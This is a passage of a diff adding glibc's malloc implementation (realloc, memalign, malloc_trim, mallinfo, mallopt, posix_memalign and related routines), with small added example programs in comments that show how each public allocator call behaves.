+	check_inuse_chunk(av, p);
+	nextp = p->fd;
+
+	/* Slightly streamlined version of consolidation code in free() */
+	size = chunksize (p);
+	nextchunk = chunk_at_offset(p, size);
+	nextsize = chunksize(nextchunk);
+
+	if (!prev_inuse(p)) {
+	  prevsize = prev_size (p);
+	  size += prevsize;
+	  p = chunk_at_offset(p, -((long) prevsize));
+	  unlink(av, p, bck, fwd);
+	}
+
+	if (nextchunk != av->top) {
+	  nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+	  if (!nextinuse) {
+	    size += nextsize;
+	    unlink(av, nextchunk, bck, fwd);
+	  } else
+	    clear_inuse_bit_at_offset(nextchunk, 0);
+
+	  first_unsorted = unsorted_bin->fd;
+	  unsorted_bin->fd = p;
+	  first_unsorted->bk = p;
+
+	  if (!in_smallbin_range (size)) {
+	    p->fd_nextsize = NULL;
+	    p->bk_nextsize = NULL;
+	  }
+
+	  set_head(p, size | PREV_INUSE);
+	  p->bk = unsorted_bin;
+	  p->fd = first_unsorted;
+	  set_foot(p, size);
+	}
+
+	else {
+	  size += nextsize;
+	  set_head(p, size | PREV_INUSE);
+	  av->top = p;
+	}
+
+      } while ( (p = nextp) != 0);
+
+    }
+  } while (fb++ != maxfb);
+}
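+
+/* A rough sketch (not from the upstream sources): malloc_consolidate can be
+   observed from the outside through mallinfo(), whose fsmblks field is the
+   total space held in fastbins (see int_mallinfo further down).  Freed
+   fastbin-sized chunks that overflow the tcache show up there until a large
+   request consolidates them:
+
+     #include <malloc.h>
+     #include <stdio.h>
+     #include <stdlib.h>
+
+     int main (void)
+     {
+       void *v[16];
+       for (int i = 0; i < 16; i++) v[i] = malloc (40);
+       for (int i = 0; i < 16; i++) free (v[i]);
+       printf ("fastbin bytes before: %d\n", mallinfo ().fsmblks);
+       void *big = malloc (64 * 1024);   // large request -> consolidation
+       printf ("fastbin bytes after:  %d\n", mallinfo ().fsmblks);
+       free (big);
+       return 0;
+     }
+*/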
+
+/*
+  ------------------------------ realloc ------------------------------
+*/
+
+void*
+_int_realloc(mstate av, mchunkptr oldp, INTERNAL_SIZE_T oldsize,
+	     INTERNAL_SIZE_T nb)
+{
+  mchunkptr        newp;            /* chunk to return */
+  INTERNAL_SIZE_T  newsize;         /* its size */
+  void*          newmem;          /* corresponding user mem */
+
+  mchunkptr        next;            /* next contiguous chunk after oldp */
+
+  mchunkptr        remainder;       /* extra space at end of newp */
+  unsigned long    remainder_size;  /* its size */
+
+  mchunkptr        bck;             /* misc temp for linking */
+  mchunkptr        fwd;             /* misc temp for linking */
+
+  unsigned long    copysize;        /* bytes to copy */
+  unsigned int     ncopies;         /* INTERNAL_SIZE_T words to copy */
+  INTERNAL_SIZE_T* s;               /* copy source */
+  INTERNAL_SIZE_T* d;               /* copy destination */
+
+  /* oldmem size */
+  if (__builtin_expect (chunksize_nomask (oldp) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (oldsize >= av->system_mem, 0))
+    malloc_printerr ("realloc(): invalid old size");
+
+  check_inuse_chunk (av, oldp);
+
+  /* All callers already filter out mmap'ed chunks.  */
+  assert (!chunk_is_mmapped (oldp));
+
+  next = chunk_at_offset (oldp, oldsize);
+  INTERNAL_SIZE_T nextsize = chunksize (next);
+  if (__builtin_expect (chunksize_nomask (next) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (nextsize >= av->system_mem, 0))
+    malloc_printerr ("realloc(): invalid next size");
+
+  if ((unsigned long) (oldsize) >= (unsigned long) (nb))
+    {
+      /* already big enough; split below */
+      newp = oldp;
+      newsize = oldsize;
+    }
+
+  else
+    {
+      /* Try to expand forward into top */
+      if (next == av->top &&
+          (unsigned long) (newsize = oldsize + nextsize) >=
+          (unsigned long) (nb + MINSIZE))
+        {
+          set_head_size (oldp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+          av->top = chunk_at_offset (oldp, nb);
+          set_head (av->top, (newsize - nb) | PREV_INUSE);
+          check_inuse_chunk (av, oldp);
+          return chunk2mem (oldp);
+        }
+
+      /* Try to expand forward into next chunk;  split off remainder below */
+      else if (next != av->top &&
+               !inuse (next) &&
+               (unsigned long) (newsize = oldsize + nextsize) >=
+               (unsigned long) (nb))
+        {
+          newp = oldp;
+          unlink (av, next, bck, fwd);
+        }
+
+      /* allocate, copy, free */
+      else
+        {
+          newmem = _int_malloc (av, nb - MALLOC_ALIGN_MASK);
+          if (newmem == 0)
+            return 0; /* propagate failure */
+
+          newp = mem2chunk (newmem);
+          newsize = chunksize (newp);
+
+          /*
+             Avoid copy if newp is next chunk after oldp.
+           */
+          if (newp == next)
+            {
+              newsize += oldsize;
+              newp = oldp;
+            }
+          else
+            {
+              /*
+                 Unroll copy of <= 36 bytes (72 if 8-byte sizes).
+                 We know that contents have an odd number of
+                 INTERNAL_SIZE_T-sized words; minimally 3.
+               */
+
+              copysize = oldsize - SIZE_SZ;
+              s = (INTERNAL_SIZE_T *) (chunk2mem (oldp));
+              d = (INTERNAL_SIZE_T *) (newmem);
+              ncopies = copysize / sizeof (INTERNAL_SIZE_T);
+              assert (ncopies >= 3);
+
+              if (ncopies > 9)
+                memcpy (d, s, copysize);
+
+              else
+                {
+                  *(d + 0) = *(s + 0);
+                  *(d + 1) = *(s + 1);
+                  *(d + 2) = *(s + 2);
+                  if (ncopies > 4)
+                    {
+                      *(d + 3) = *(s + 3);
+                      *(d + 4) = *(s + 4);
+                      if (ncopies > 6)
+                        {
+                          *(d + 5) = *(s + 5);
+                          *(d + 6) = *(s + 6);
+                          if (ncopies > 8)
+                            {
+                              *(d + 7) = *(s + 7);
+                              *(d + 8) = *(s + 8);
+                            }
+                        }
+                    }
+                }
+
+              _int_free (av, oldp, 1);
+              check_inuse_chunk (av, newp);
+              return chunk2mem (newp);
+            }
+        }
+    }
+
+  /* If possible, free extra space in old or extended chunk */
+
+  assert ((unsigned long) (newsize) >= (unsigned long) (nb));
+
+  remainder_size = newsize - nb;
+
+  if (remainder_size < MINSIZE)   /* not enough extra to split off */
+    {
+      set_head_size (newp, newsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+    }
+  else   /* split remainder */
+    {
+      remainder = chunk_at_offset (newp, nb);
+      set_head_size (newp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      /* Mark remainder as inuse so free() won't complain */
+      set_inuse_bit_at_offset (remainder, remainder_size);
+      _int_free (av, remainder, 1);
+    }
+
+  check_inuse_chunk (av, newp);
+  return chunk2mem (newp);
+}
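+
+/* A minimal sketch (not from the upstream sources): _int_realloc prefers to
+   reuse the old chunk -- shrinking it in place, or growing into top or a
+   free neighbour -- and only falls back to allocate/copy/free.  Shrinking
+   therefore normally keeps the same address:
+
+     #include <stdio.h>
+     #include <stdlib.h>
+
+     int main (void)
+     {
+       char *p = malloc (256);
+       char *q = realloc (p, 64);   // oldsize >= nb: split in place
+       printf ("in place: %d\n", p == q);
+       free (q);
+       return 0;
+     }
+*/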
+
+/*
+   ------------------------------ memalign ------------------------------
+ */
+
+static void *
+_int_memalign (mstate av, size_t alignment, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;             /* padded  request size */
+  char *m;                        /* memory returned by malloc call */
+  mchunkptr p;                    /* corresponding chunk */
+  char *brk;                      /* alignment point within p */
+  mchunkptr newp;                 /* chunk to return */
+  INTERNAL_SIZE_T newsize;        /* its size */
+  INTERNAL_SIZE_T leadsize;       /* leading space before alignment point */
+  mchunkptr remainder;            /* spare room at end to split off */
+  unsigned long remainder_size;   /* its size */
+  INTERNAL_SIZE_T size;
+
+
+
+  checked_request2size (bytes, nb);
+
+  /*
+     Strategy: find a spot within that chunk that meets the alignment
+     request, and then possibly free the leading and trailing space.
+   */
+
+
+  /* Check for overflow.  */
+  if (nb > SIZE_MAX - alignment - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+  /* Call malloc with worst case padding to hit alignment. */
+
+  m = (char *) (_int_malloc (av, nb + alignment + MINSIZE));
+
+  if (m == 0)
+    return 0;           /* propagate failure */
+
+  p = mem2chunk (m);
+
+  if ((((unsigned long) (m)) % alignment) != 0)   /* misaligned */
+
+    { /*
+                Find an aligned spot inside chunk.  Since we need to give back
+                leading space in a chunk of at least MINSIZE, if the first
+                calculation places us at a spot with less than MINSIZE leader,
+                we can move to the next aligned spot -- we've allocated enough
+                total room so that this is always possible.
+                 */
+      brk = (char *) mem2chunk (((unsigned long) (m + alignment - 1)) &
+                                - ((signed long) alignment));
+      if ((unsigned long) (brk - (char *) (p)) < MINSIZE)
+        brk += alignment;
+
+      newp = (mchunkptr) brk;
+      leadsize = brk - (char *) (p);
+      newsize = chunksize (p) - leadsize;
+
+      /* For mmapped chunks, just adjust offset */
+      if (chunk_is_mmapped (p))
+        {
+          set_prev_size (newp, prev_size (p) + leadsize);
+          set_head (newp, newsize | IS_MMAPPED);
+          return chunk2mem (newp);
+        }
+
+      /* Otherwise, give back leader, use the rest */
+      set_head (newp, newsize | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+      set_head_size (p, leadsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      _int_free (av, p, 1);
+      p = newp;
+
+      assert (newsize >= nb &&
+              (((unsigned long) (chunk2mem (p))) % alignment) == 0);
+    }
+
+  /* Also give back spare room at the end */
+  if (!chunk_is_mmapped (p))
+    {
+      size = chunksize (p);
+      if ((unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (p, nb);
+          set_head (remainder, remainder_size | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head_size (p, nb);
+          _int_free (av, remainder, 1);
+        }
+    }
+
+  check_inuse_chunk (av, p);
+  return chunk2mem (p);
+}
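+
+/* A minimal sketch (not from the upstream sources): _int_memalign simply
+   over-allocates by alignment + MINSIZE, picks an aligned spot inside the
+   oversized chunk and gives the leading and trailing slack back with
+   _int_free.  From the public API:
+
+     #include <malloc.h>
+     #include <stdint.h>
+     #include <stdio.h>
+     #include <stdlib.h>
+
+     int main (void)
+     {
+       void *p = memalign (4096, 100);
+       printf ("aligned: %d\n", (int) (((uintptr_t) p % 4096) == 0));
+       free (p);
+       return 0;
+     }
+*/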
+
+
+/*
+   ------------------------------ malloc_trim ------------------------------
+ */
+
+static int
+mtrim (mstate av, size_t pad)
+{
+  /* Ensure all blocks are consolidated.  */
+  malloc_consolidate (av);
+
+  const size_t ps = GLRO (dl_pagesize);
+  int psindex = bin_index (ps);
+  const size_t psm1 = ps - 1;
+
+  int result = 0;
+  for (int i = 1; i < NBINS; ++i)
+    if (i == 1 || i >= psindex)
+      {
+        mbinptr bin = bin_at (av, i);
+
+        for (mchunkptr p = last (bin); p != bin; p = p->bk)
+          {
+            INTERNAL_SIZE_T size = chunksize (p);
+
+            if (size > psm1 + sizeof (struct malloc_chunk))
+              {
+                /* See whether the chunk contains at least one unused page.  */
+                char *paligned_mem = (char *) (((uintptr_t) p
+                                                + sizeof (struct malloc_chunk)
+                                                + psm1) & ~psm1);
+
+                assert ((char *) chunk2mem (p) + 4 * SIZE_SZ <= paligned_mem);
+                assert ((char *) p + size > paligned_mem);
+
+                /* This is the size we could potentially free.  */
+                size -= paligned_mem - (char *) p;
+
+                if (size > psm1)
+                  {
+#if MALLOC_DEBUG
+                    /* When debugging we simulate destroying the memory
+                       content.  */
+                    memset (paligned_mem, 0x89, size & ~psm1);
+#endif
+                    __madvise (paligned_mem, size & ~psm1, MADV_DONTNEED);
+
+                    result = 1;
+                  }
+              }
+          }
+      }
+
+#ifndef MORECORE_CANNOT_TRIM
+  return result | (av == &main_arena ? systrim (pad, av) : 0);
+
+#else
+  return result;
+#endif
+}
+
+
+int
+__malloc_trim (size_t s)
+{
+  int result = 0;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      result |= mtrim (ar_ptr, s);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return result;
+}
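+
+/* A minimal sketch (not from the upstream sources): malloc_trim() walks all
+   arenas, consolidates, madvise()s whole free pages inside the bins back to
+   the kernel and lets systrim shrink the main-arena top; it returns 1 if any
+   memory could actually be released.
+
+     #include <malloc.h>
+     #include <stdio.h>
+     #include <stdlib.h>
+
+     int main (void)
+     {
+       void *p = malloc (64 * 1024);
+       free (p);                                    // merges back into top
+       printf ("trimmed: %d\n", malloc_trim (0));   // pad of 0 bytes
+       return 0;
+     }
+*/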
+
+
+/*
+   ------------------------- malloc_usable_size -------------------------
+ */
+
+static size_t
+musable (void *mem)
+{
+  mchunkptr p;
+  if (mem != 0)
+    {
+      p = mem2chunk (mem);
+
+      if (__builtin_expect (using_malloc_checking == 1, 0))
+        return malloc_check_get_size (p);
+
+      if (chunk_is_mmapped (p))
+	{
+	  if (DUMPED_MAIN_ARENA_CHUNK (p))
+	    return chunksize (p) - SIZE_SZ;
+	  else
+	    return chunksize (p) - 2 * SIZE_SZ;
+	}
+      else if (inuse (p))
+        return chunksize (p) - SIZE_SZ;
+    }
+  return 0;
+}
+
+
+size_t
+__malloc_usable_size (void *m)
+{
+  size_t result;
+
+  result = musable (m);
+  return result;
+}
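+
+/* A minimal sketch (not from the upstream sources): because requests are
+   rounded up to chunk granularity, musable() usually reports somewhat more
+   than was asked for, and that extra tail is legitimately usable:
+
+     #include <malloc.h>
+     #include <stdio.h>
+     #include <stdlib.h>
+
+     int main (void)
+     {
+       void *p = malloc (100);
+       printf ("requested 100, usable %zu\n", malloc_usable_size (p));
+       free (p);
+       return 0;
+     }
+*/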
+
+/*
+   ------------------------------ mallinfo ------------------------------
+   Accumulate malloc statistics for arena AV into M.
+ */
+
+static void
+int_mallinfo (mstate av, struct mallinfo *m)
+{
+  size_t i;
+  mbinptr b;
+  mchunkptr p;
+  INTERNAL_SIZE_T avail;
+  INTERNAL_SIZE_T fastavail;
+  int nblocks;
+  int nfastblocks;
+
+  check_malloc_state (av);
+
+  /* Account for top */
+  avail = chunksize (av->top);
+  nblocks = 1;  /* top always exists */
+
+  /* traverse fastbins */
+  nfastblocks = 0;
+  fastavail = 0;
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      for (p = fastbin (av, i); p != 0; p = p->fd)
+        {
+          ++nfastblocks;
+          fastavail += chunksize (p);
+        }
+    }
+
+  avail += fastavail;
+
+  /* traverse regular bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+      for (p = last (b); p != b; p = p->bk)
+        {
+          ++nblocks;
+          avail += chunksize (p);
+        }
+    }
+
+  m->smblks += nfastblocks;
+  m->ordblks += nblocks;
+  m->fordblks += avail;
+  m->uordblks += av->system_mem - avail;
+  m->arena += av->system_mem;
+  m->fsmblks += fastavail;
+  if (av == &main_arena)
+    {
+      m->hblks = mp_.n_mmaps;
+      m->hblkhd = mp_.mmapped_mem;
+      m->usmblks = 0;
+      m->keepcost = chunksize (av->top);
+    }
+}
+
+
+struct mallinfo
+__libc_mallinfo (void)
+{
+  struct mallinfo m;
+  mstate ar_ptr;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  memset (&m, 0, sizeof (m));
+  ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &m);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return m;
+}
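+
+/* A minimal sketch (not from the upstream sources): the classic mallinfo
+   interface exposes the per-arena numbers gathered by int_mallinfo, summed
+   over every arena.  Reading a few of the fields:
+
+     #include <malloc.h>
+     #include <stdio.h>
+
+     int main (void)
+     {
+       struct mallinfo mi = mallinfo ();
+       printf ("arena    (heap bytes)      = %d\n", mi.arena);
+       printf ("uordblks (in-use bytes)    = %d\n", mi.uordblks);
+       printf ("fordblks (free bytes)      = %d\n", mi.fordblks);
+       printf ("keepcost (trimmable bytes) = %d\n", mi.keepcost);
+       return 0;
+     }
+*/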
+
+/*
+   ------------------------------ malloc_stats ------------------------------
+ */
+
+void
+__malloc_stats (void)
+{
+  int i;
+  mstate ar_ptr;
+  unsigned int in_use_b = mp_.mmapped_mem, system_b = in_use_b;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  _IO_flockfile (stderr);
+  int old_flags2 = stderr->_flags2;
+  stderr->_flags2 |= _IO_FLAGS2_NOTCANCEL;
+  for (i = 0, ar_ptr = &main_arena;; i++)
+    {
+      struct mallinfo mi;
+
+      memset (&mi, 0, sizeof (mi));
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &mi);
+      fprintf (stderr, "Arena %d:\n", i);
+      fprintf (stderr, "system bytes     = %10u\n", (unsigned int) mi.arena);
+      fprintf (stderr, "in use bytes     = %10u\n", (unsigned int) mi.uordblks);
+#if MALLOC_DEBUG > 1
+      if (i > 0)
+        dump_heap (heap_for_ptr (top (ar_ptr)));
+#endif
+      system_b += mi.arena;
+      in_use_b += mi.uordblks;
+      __libc_lock_unlock (ar_ptr->mutex);
+      ar_ptr = ar_ptr->next;
+      if (ar_ptr == &main_arena)
+        break;
+    }
+  fprintf (stderr, "Total (incl. mmap):\n");
+  fprintf (stderr, "system bytes     = %10u\n", system_b);
+  fprintf (stderr, "in use bytes     = %10u\n", in_use_b);
+  fprintf (stderr, "max mmap regions = %10u\n", (unsigned int) mp_.max_n_mmaps);
+  fprintf (stderr, "max mmap bytes   = %10lu\n",
+           (unsigned long) mp_.max_mmapped_mem);
+  stderr->_flags2 = old_flags2;
+  _IO_funlockfile (stderr);
+}
+
+
+/*
+   ------------------------------ mallopt ------------------------------
+ */
+static inline int
+__always_inline
+do_set_trim_threshold (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_trim_threshold, 3, value, mp_.trim_threshold,
+	      mp_.no_dyn_threshold);
+  mp_.trim_threshold = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_top_pad (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_top_pad, 3, value, mp_.top_pad,
+	      mp_.no_dyn_threshold);
+  mp_.top_pad = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_mmap_threshold (size_t value)
+{
+  /* Forbid setting the threshold too high.  */
+  if (value <= HEAP_MAX_SIZE / 2)
+    {
+      LIBC_PROBE (memory_mallopt_mmap_threshold, 3, value, mp_.mmap_threshold,
+		  mp_.no_dyn_threshold);
+      mp_.mmap_threshold = value;
+      mp_.no_dyn_threshold = 1;
+      return 1;
+    }
+  return 0;
+}
+
+static inline int
+__always_inline
+do_set_mmaps_max (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_mmap_max, 3, value, mp_.n_mmaps_max,
+	      mp_.no_dyn_threshold);
+  mp_.n_mmaps_max = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_mallopt_check (int32_t value)
+{
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_perturb_byte (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_perturb, 2, value, perturb_byte);
+  perturb_byte = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_arena_test (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_test, 2, value, mp_.arena_test);
+  mp_.arena_test = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_arena_max (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_max, 2, value, mp_.arena_max);
+  mp_.arena_max = value;
+  return 1;
+}
+
+#if USE_TCACHE
+static inline int
+__always_inline
+do_set_tcache_max (size_t value)
+{
+  if (value >= 0 && value <= MAX_TCACHE_SIZE)
+    {
+      LIBC_PROBE (memory_tunable_tcache_max_bytes, 2, value, mp_.tcache_max_bytes);
+      mp_.tcache_max_bytes = value;
+      mp_.tcache_bins = csize2tidx (request2size(value)) + 1;
+    }
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_tcache_count (size_t value)
+{
+  LIBC_PROBE (memory_tunable_tcache_count, 2, value, mp_.tcache_count);
+  mp_.tcache_count = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_tcache_unsorted_limit (size_t value)
+{
+  LIBC_PROBE (memory_tunable_tcache_unsorted_limit, 2, value, mp_.tcache_unsorted_limit);
+  mp_.tcache_unsorted_limit = value;
+  return 1;
+}
+#endif
+
+int
+__libc_mallopt (int param_number, int value)
+{
+  mstate av = &main_arena;
+  int res = 1;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  __libc_lock_lock (av->mutex);
+
+  LIBC_PROBE (memory_mallopt, 2, param_number, value);
+
+  /* We must consolidate main arena before changing max_fast
+     (see definition of set_max_fast).  */
+  malloc_consolidate (av);
+
+  switch (param_number)
+    {
+    case M_MXFAST:
+      if (value >= 0 && value <= MAX_FAST_SIZE)
+        {
+          LIBC_PROBE (memory_mallopt_mxfast, 2, value, get_max_fast ());
+          set_max_fast (value);
+        }
+      else
+        res = 0;
+      break;
+
+    case M_TRIM_THRESHOLD:
+      do_set_trim_threshold (value);
+      break;
+
+    case M_TOP_PAD:
+      do_set_top_pad (value);
+      break;
+
+    case M_MMAP_THRESHOLD:
+      res = do_set_mmap_threshold (value);
+      break;
+
+    case M_MMAP_MAX:
+      do_set_mmaps_max (value);
+      break;
+
+    case M_CHECK_ACTION:
+      do_set_mallopt_check (value);
+      break;
+
+    case M_PERTURB:
+      do_set_perturb_byte (value);
+      break;
+
+    case M_ARENA_TEST:
+      if (value > 0)
+	do_set_arena_test (value);
+      break;
+
+    case M_ARENA_MAX:
+      if (value > 0)
+	do_set_arena_max (value);
+      break;
+    }
+  __libc_lock_unlock (av->mutex);
+  return res;
+}
+libc_hidden_def (__libc_mallopt)
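+
+/* A minimal sketch (not from the upstream sources): mallopt() is the classic
+   SVID knob interface over the same parameters.  For instance, M_PERTURB
+   makes the allocator scribble a recognizable pattern over allocated and
+   freed memory (useful for catching use of uninitialized or freed data),
+   and M_MXFAST 0 disables fastbin caching entirely:
+
+     #include <malloc.h>
+     #include <stdlib.h>
+
+     int main (void)
+     {
+       mallopt (M_PERTURB, 0x5a);   // poison allocated and freed memory
+       mallopt (M_MXFAST, 0);       // no fastbins from now on
+       void *p = malloc (64);
+       free (p);
+       return 0;
+     }
+*/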
+
+
+/*
+   -------------------- Alternative MORECORE functions --------------------
+ */
+
+
+/*
+   General Requirements for MORECORE.
+
+   The MORECORE function must have the following properties:
+
+   If MORECORE_CONTIGUOUS is false:
+
+ * MORECORE must allocate in multiples of pagesize. It will
+      only be called with arguments that are multiples of pagesize.
+
+ * MORECORE(0) must return an address that is at least
+      MALLOC_ALIGNMENT aligned. (Page-aligning always suffices.)
+
+   else (i.e. If MORECORE_CONTIGUOUS is true):
+
+ * Consecutive calls to MORECORE with positive arguments
+      return increasing addresses, indicating that space has been
+      contiguously extended.
+
+ * MORECORE need not allocate in multiples of pagesize.
+      Calls to MORECORE need not have args of multiples of pagesize.
+
+ * MORECORE need not page-align.
+
+   In either case:
+
+ * MORECORE may allocate more memory than requested. (Or even less,
+      but this will generally result in a malloc failure.)
+
+ * MORECORE must not allocate memory when given argument zero, but
+      instead return one past the end address of memory from previous
+      nonzero call. This malloc does NOT call MORECORE(0)
+      until at least one call with positive arguments is made, so
+      the initial value returned is not important.
+
+ * Even though consecutive calls to MORECORE need not return contiguous
+      addresses, it must be OK for malloc'ed chunks to span multiple
+      regions in those cases where they do happen to be contiguous.
+
+ * MORECORE need not handle negative arguments -- it may instead
+      just return MORECORE_FAILURE when given negative arguments.
+      Negative arguments are always multiples of pagesize. MORECORE
+      must not misinterpret negative args as large positive unsigned
+      args. You can suppress all such calls from even occurring by defining
+      MORECORE_CANNOT_TRIM.
+
+   There is some variation across systems about the type of the
+   argument to sbrk/MORECORE. If size_t is unsigned, then it cannot
+   actually be size_t, because sbrk supports negative args, so it is
+   normally the signed type of the same width as size_t (sometimes
+   declared as "intptr_t", and sometimes "ptrdiff_t").  It doesn't much
+   matter though. Internally, we use "long" as arguments, which should
+   work across all reasonable possibilities.
+
+   Additionally, if MORECORE ever returns failure for a positive
+   request, then mmap is used as a noncontiguous system allocator. This
+   is a useful backup strategy for systems with holes in address spaces
+   -- in this case sbrk cannot contiguously expand the heap, but mmap
+   may be able to map noncontiguous space.
+
+   If you'd like mmap to ALWAYS be used, you can define MORECORE to be
+   a function that always returns MORECORE_FAILURE.
+
+   If you are using this malloc with something other than sbrk (or its
+   emulation) to supply memory regions, you probably want to set
+   MORECORE_CONTIGUOUS as false.  As an example, here is a custom
+   allocator kindly contributed for pre-OSX macOS.  It uses virtually
+   but not necessarily physically contiguous non-paged memory (locked
+   in, present and won't get swapped out).  You can use it by
+   uncommenting this section, adding some #includes, and setting up the
+   appropriate defines above:
+
+ *#define MORECORE osMoreCore
+ *#define MORECORE_CONTIGUOUS 0
+
+   There is also a shutdown routine that should somehow be called for
+   cleanup upon program exit.
+
+ *#define MAX_POOL_ENTRIES 100
+ *#define MINIMUM_MORECORE_SIZE  (64 * 1024)
+   static int next_os_pool;
+   void *our_os_pools[MAX_POOL_ENTRIES];
+
+   void *osMoreCore(int size)
+   {
+    void *ptr = 0;
+    static void *sbrk_top = 0;
+
+    if (size > 0)
+    {
+      if (size < MINIMUM_MORECORE_SIZE)
+         size = MINIMUM_MORECORE_SIZE;
+      if (CurrentExecutionLevel() == kTaskLevel)
+         ptr = PoolAllocateResident(size + RM_PAGE_SIZE, 0);
+      if (ptr == 0)
+      {
+        return (void *) MORECORE_FAILURE;
+      }
+      // save ptrs so they can be freed during cleanup
+      our_os_pools[next_os_pool] = ptr;
+      next_os_pool++;
+      ptr = (void *) ((((unsigned long) ptr) + RM_PAGE_MASK) & ~RM_PAGE_MASK);
+      sbrk_top = (char *) ptr + size;
+      return ptr;
+    }
+    else if (size < 0)
+    {
+      // we don't currently support shrink behavior
+      return (void *) MORECORE_FAILURE;
+    }
+    else
+    {
+      return sbrk_top;
+    }
+   }
+
+   // cleanup any allocated memory pools
+   // called as last thing before shutting down driver
+
+   void osCleanupMem(void)
+   {
+    void **ptr;
+
+    for (ptr = our_os_pools; ptr < &our_os_pools[MAX_POOL_ENTRIES]; ptr++)
+      if (*ptr)
+      {
+         PoolDeallocate(*ptr);
+ * ptr = 0;
+      }
+   }
+
+ */
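+
+/* A small sketch (not from the upstream comment above): forcing the
+   mmap-only mode it mentions amounts to supplying a MORECORE that always
+   fails, e.g. when building a standalone copy of this allocator:
+
+     static void *
+     morecore_always_fail (ptrdiff_t increment)
+     {
+       return (void *) MORECORE_FAILURE;   // push every request to mmap
+     }
+
+     #define MORECORE morecore_always_fail
+     #define MORECORE_CONTIGUOUS 0
+*/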
+
+
+/* Helper code.  */
+
+extern char **__libc_argv attribute_hidden;
+
+static void
+malloc_printerr (const char *str)
+{
+  __libc_message (do_abort, "%s\n", str);
+  __builtin_unreachable ();
+}
+
+/* We need a wrapper function for one of the additions of POSIX.  */
+int
+__posix_memalign (void **memptr, size_t alignment, size_t size)
+{
+  void *mem;
+
+  /* Test whether the SIZE argument is valid.  It must be a power of
+     two multiple of sizeof (void *).  */
+  if (alignment % sizeof (void *) != 0
+      || !powerof2 (alignment / sizeof (void *))
+      || alignment == 0)
+    return EINVAL;
+
+
+  void *address = RETURN_ADDRESS (0);
+  mem = _mid_memalign (alignment, size, address);
+
+  if (mem != NULL)
+    {
+      *memptr = mem;
+      return 0;
+    }
+
+  return ENOMEM;
+}
+weak_alias (__posix_memalign, posix_memalign)
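+
+/* A minimal sketch (not from the upstream sources): unlike memalign, the
+   POSIX wrapper validates the alignment itself -- a power of two multiple of
+   sizeof (void *) -- and reports failure through its return value rather
+   than errno:
+
+     #include <stdio.h>
+     #include <stdlib.h>
+
+     int main (void)
+     {
+       void *p = NULL;
+       printf ("alignment 3: %d\n", posix_memalign (&p, 3, 64));  // EINVAL
+       if (posix_memalign (&p, 64, 64) == 0)                      // valid
+         {
+           printf ("got %p\n", p);
+           free (p);
+         }
+       return 0;
+     }
+*/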
+
+
+int
+__malloc_info (int options, FILE *fp)
+{
+  /* For now, at least.  */
+  if (options != 0)
+    return EINVAL;
+
+  int n = 0;
+  size_t total_nblocks = 0;
+  size_t total_nfastblocks = 0;
+  size_t total_avail = 0;
+  size_t total_fastavail = 0;
+  size_t total_system = 0;
+  size_t total_max_system = 0;
+  size_t total_aspace = 0;
+  size_t total_aspace_mprotect = 0;
+
+
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  fputs ("<malloc version=\"1\">\n", fp);
+
+  /* Iterate over all arenas currently in use.  */
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      fprintf (fp, "<heap nr=\"%d\">\n<sizes>\n", n++);
+
+      size_t nblocks = 0;
+      size_t nfastblocks = 0;
+      size_t avail = 0;
+      size_t fastavail = 0;
+      struct
+      {
+	size_t from;
+	size_t to;
+	size_t total;
+	size_t count;
+      } sizes[NFASTBINS + NBINS - 1];
+#define nsizes (sizeof (sizes) / sizeof (sizes[0]))
+
+      __libc_lock_lock (ar_ptr->mutex);
+
+      for (size_t i = 0; i < NFASTBINS; ++i)
+	{
+	  mchunkptr p = fastbin (ar_ptr, i);
+	  if (p != NULL)
+	    {
+	      size_t nthissize = 0;
